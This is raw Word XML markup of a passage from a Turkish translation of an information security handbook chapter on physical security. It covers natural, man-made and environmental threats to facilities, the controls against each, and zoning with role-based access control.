          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kontrollerin, bir bütün olarak, verilen bir tehdide caydırması, tespit edilmesi, geciktirilmesi ve tepki verme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">si gerektiğine dikkat edin. </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4. Doğal Tehditler</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yi fiziksel güvenlik bazı tehditlere karşı psikolojik bir avantaja sahipti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r. Ne yazık ki, doğal tehditler </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">onlardan biri değil. Bu tehdit caydırılamaz veya caydırılamaz. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bir anda veya başka, Tabiat Ana </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tesisi tehdit ediyor. Tek seçe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nek, etkiyi en aza indirecek ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hızlı düzelme. Doğal tehditler ve kontrollerinin bazıları şunlard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ıcaklı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uma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öndürme maddesi (örneğin, yangın söndürücüler ve su)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uman detektörlerini ekipmanın yakınına kurma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söndürücülerin kurulması ve çalışanların uygun kullanımları için eğit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nin yakınında gazlı (likit olmayan) söndürme sistemlerinin kullan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üzenli yangın tahliye tatbikatları yap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Şiddetli Hava Koşulları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Şimş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AU1997_Frame_Ch158 Sayfa 1927 18 Kasım 2003 Salı 10:03</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928 Bilgi Güvenliği Yönetimi El Kita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ğır rüzgar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olu</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baskın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Şiddetli hava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va koşullarının izlen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ı hava koşullarına dayanıklı ve güçlü rüzgarlara dayanabilecek alanlarda tutma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ın doğru şekilde topraklandığından emin olu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algalanma bastırıcıları ve kesintisiz güç kaynaklarını (UPS) veya dizel jeneratörleri takm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ükseltilmiş döşeme montaj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üzenli hava tahliye tatbikatları yap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remler, diğer doğal afetleri teşvik etme kabiliyetleri nedeniyle özellikle tehlikelid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yangınlar. Deprem kaynaklı yangınların teminatlı hasarına ek olarak, bazı ek riskler şunlard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cil durum ajanslarından sınırlı cevap veya cevap yo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lerde ve bilgi sistemlerinde kalıcı yapısal fiziksel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çersiz kılma tehdidi kontrolleri (örneğin, yangın söndürme özelliğini devre dışı bırak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Personel tahliyesi sınırl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rem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Bilgi sistemleri ekipmanını yüksek yüzeylerden uzak tutmak (doğru montaj olmada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ekipmanını cam pencerelerden uzak tutma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 ve altyapı üzerine depreme dayanıklı veya anti vibrasyon cihazları kurma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prem tatbikatlarının yap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Doğal tehditler her zaman yukarıda sıralanan dramatik olaylar değildir. Genel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">likle çok daha ince olabilirler </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve öngörülemeyen şekli. Buna bir örnek, zaman içinde kuru ısıya, neme ve hafif rüzgarlara ma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ruz kalmadır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu daha az şiddetli tehditler derhal alarm vermeyebilir, ancak potansiyellerinin farkında olmalı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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etki.</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5. İnsan Yapımı Tehdit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 Yapımı Tehdit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kinci tehdit sınıfına insan yapımı denir. Bu tür bir tehdit genellikle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> en dinamik ve en zor olanıdır,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> insan doğasında bağları nedeniyle. Bu, insan yapımı tehditlere neden olan üç motive edici ajanın, kötülük, fırsat ve kaza sonucu ortaya çıkan bir sonuçtan çıkarılmıştır. İnsan kaynaklı tehditler ve bazı kontrol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Dahil et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ırsızlık / dolandırıcılık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yeteneklerinin azaltılması veya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ırsızlık / dolandırıcılık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Tesisin izlendiğini ve terk edildiğinde kişilerin denetlenebileceğini belirten işaretler gönderild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Pr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CC TV'ler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</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yi stok kontrol uygulama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yi kilit ve temel uygulama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 işe alma / işten çıkarma uygulama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asusluk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ekabet avantajı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asusluk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CC TV’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Güvenlik ve güvenlik bilinçli çalışan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 işe alma / işten çıkarma uygulama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abotaj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yeteneklerinin azaltılması veya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abotaj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CC TV’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şyerinde şiddet aşağıdaki risklere neden olmaktad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lara zarar veya ölüm</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Verimlilik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şyerinde şiddet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CC TV’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Uyarı işaretlerinin farkındalığ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 işe alma / işten çıkarma uygulamaları</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 aklının ustalığı ve uyarlanabilir doğası insan yapımı tehditleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n kontrolünü zorlaştırıyor. Bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kuruluş, koruma programı ile ilgili rutin değerlendirmeler </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yaparak dikkatli davranmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu tehditlere karşı uygulanan kontroller.</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6. Çevresel Tehdit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Üçüncü tehdit sınıfı, çevresel tehditler olarak etiketlenmiştir. Çevresel kontroller operasyon için önemlidir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve bilgilerin ve sistemlerin korunması. Temiz hava, su, güç ve güvenilir iklim kontrolleri olmada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 tutarsız performansa veya tamamen başarısızlığa uğrayabil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930 Bilgi Güvenliği Yönetimi El Kita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klim yetersizliği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 ve altyapı arızası veya aşırı ısınmanın başarısız o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olama / yedekleme medyasında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ekipman bileşenlerinde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İklim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ekipmanlarının sıcaklıklarının izlen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içeren tüm odaları makul sıcaklıklarda tutmak (60 -</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75 ° F veya 10 ila 25 ° C)</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Nem seviyelerini yüzde 20 ila 70 arasında tutma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i donanımı bulunan odalarda gereksiz ışıkların kapat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lima kontrol sisteminin rutin koruyucu bakım ve denetimlerinin yap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ve sıvı kaçağı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ya veya diğer sıvı türlerine aşırı derecede maruz kalmaktan kaynaklanan ekipman ve altyapı arız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olama / yedekleme medyasında hasar ve kritik basılı kopya bilgi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ritik ekipman bileşenlerinde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ve sıvı kaçağı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ın yakınında sıvı geçirmez kapak bulundurm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ritik bilgileri barındıran odalara drenaj, su dedektörü ve yükseltilmiş döşeme montaj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sistem donanım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atın rutin denetimlerinin yap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nin yakınında gaz veya kuru boru söndürme sistemlerinin kullan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lektrik kesintisi aşağıdaki risklere neden ol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ritik ekipman bileşenlerinde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zılım ve depolama / yedekleme medyasında has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İklim kontrolünün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iziksel erişim kontrollerinin ve izleme cihazlarının kaybı (yani, gözetleme kameraları, kapı alarmları, Kimlik /</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kart okuyucu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lektrik kesintisi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esintisiz güç kaynaklarını (UPS) veya dizel jeneratörleri kurmak ve test etmek</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algalanma bastırıcıların kullan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rilim yükselmelerini kontrol etmek için elektrik hattı filtrelerinin tak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tatik korumaların ve uygun olan yerlerde anti statik halıların kullan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ekipmanın doğru şekilde topraklandığından emin olu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vre kutuları ve kabloların düzenli olarak kontrol ed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ki ayrı şebekeden güç çekmek (mümkünse)</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Çevresel başarısızlık, kendi başına, bilgi sistemlerinde ciddi hasara neden olabilecek bir tehditt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Ancak, doğal veya insan yapımı tehditlerle de kendini gösterir. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu nedenle, yaklaşmak önemlidir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tüm tehditler derinlemesine savunma olan katmanlı bir yaklaşımla. Bu sadece kontrollerin çoğu kapsamasını </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sağlar </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tehditlerin arasında, ancak bu kontrollerin kapsamları dâhilinde de eksiksiz oldukları.</w:t>
      </w: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7. Tesis Koruma Strateji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koruma için genel bir strateji geliştirmek, iyi sonuçlara ulaşmak için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> atılan birçok adımdan biridir. B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ilgi Güvenliği. Birinin koruma stratejisi birçok prensi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pten oluşacak ve odaklanmalıdır </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bilgilerin gizliliğinin, bütünlüğünün veya erişilebilirliğinin daha büyük önemi olup olmadığı. İmar stratejisi</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Verimli ve etkili fiziksel bilgi koruması için bir temel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oluşturmak için kullanılabilir.</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18.7.1. Zoning</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mar, yeni bir kavram değildir. Geleneksel olarak, imar, yangın algılama alarmlarını kurmak için ku</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>llanılan bir işlemi ifade eder.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gizli duman veya ateş yerlerini belirlemek (tavan üstü, zemin altı v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b.). Ayrıca, denilen bir kavram</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> iki veya daha fazla alarmın istenmesini gerektirerek yanlış alarmların azaltılmasını sağlayan ç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apraz bölgeleme kullanılmıştır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> İmar, en detaylı güvenlik modeline en basitini sağlamak için </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yeterince esnektir. Bu nedenle,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> biri diğer tüm fiziksel güvenlik kontrollerini bu konsepte uygulayabilir (örneğin, hareket detek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>törleri, fiziksel izinsiz giriş</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> algılama alarmları, CCTV'ler vb.) En büyük avantaj, rol tabanlı erişim kon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trolü modelleridir. Rol bazında</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> erişim kontrol programları, kullanıcılara göre sistemlere, bilgilere </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ve fiziksel alanlara erişim organizasyondaki rolü. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sergi 158.1, rol tabanlı erişim kontrolü için imar kullanımının temel bir örneğ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ini göstermektedir. Bu örnekte, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bölgeler 1 ila 4, 4 arasında en kısıtlayıcı etiketlidir. Bu tesiste, her çalışanın erişimi var 1, 2 ve 3; Bununla birlikte, Bilgi Teknolojileri Direktörü, BT personeli ve Güvenli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">k Yöneticisi, erişime sahiptir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rolleri nede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">niyle 1, 2, 3 ve 4 bölgelerine. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Güvenliğin doğal ilerleyişi açıktır; Bir daha ileriye doğru hareket ettikçe bölge</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ler daha kısıtlayıcı hale gelir </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tesis (soldan sağa). Bu alıştırma tamamlandıktan sonra, bir sonraki adım ko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntrolleri belirlemek olacaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bu, erişim kontrol bölgelerini desteklemek için yerine konulmalıdır. Sonun daha </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kısıtlayıcı olduğunu unutmayın.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kontroller daha güç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lü ve daha güvenilir olmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fiziksel erişim denetimlerini, rol tabanlı modelleri ve bölgel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eri birleştirerek, kapsamlı bir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bilgi ve varlıklarını fiziksel olarak korumak için merkezi sistem. İmar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çok önemli bir parçası olabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> birinin bilgi güvenliği stratejisi. Bununla birlikte, b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ir imar egzersizi yapmadan önce</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir risk analizi yaptı (bir kişinin varlıklarına yönelik tehditleri ve kırılganlıklarını anlamak içi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">n) ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>risk azaltma stratejisi. Ancak o zaman imar, bir kuruluşun yapabileceği s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ağlam bir temel oluşturacaktır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bilgi güvenliği hedeflerine ulaşmak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tılar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D72E8A"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BİLGİ SİSTEMLERİ FİZİKSEL GÜVENLİK</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ğin ikinci kısmı, bilgi sistemlerinin fiziksel korunmasıdır. Tartışıldığı gibi, koruma katmanlar halinde gelmelidir. Bir kuruluşun bilgisayarlarından yalnızca birinin fiziksel bütünlüğü tehlikeye girerse, bilgi güvenliği risk altında olabilir. Birisi bir yetkisi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">z fiziksel erişim kazanmak için </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bilgisayar, bu kişi bilgisayardaki tüm bilgilere ve muhtemelen herhangi birisine </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E8A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>erişebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
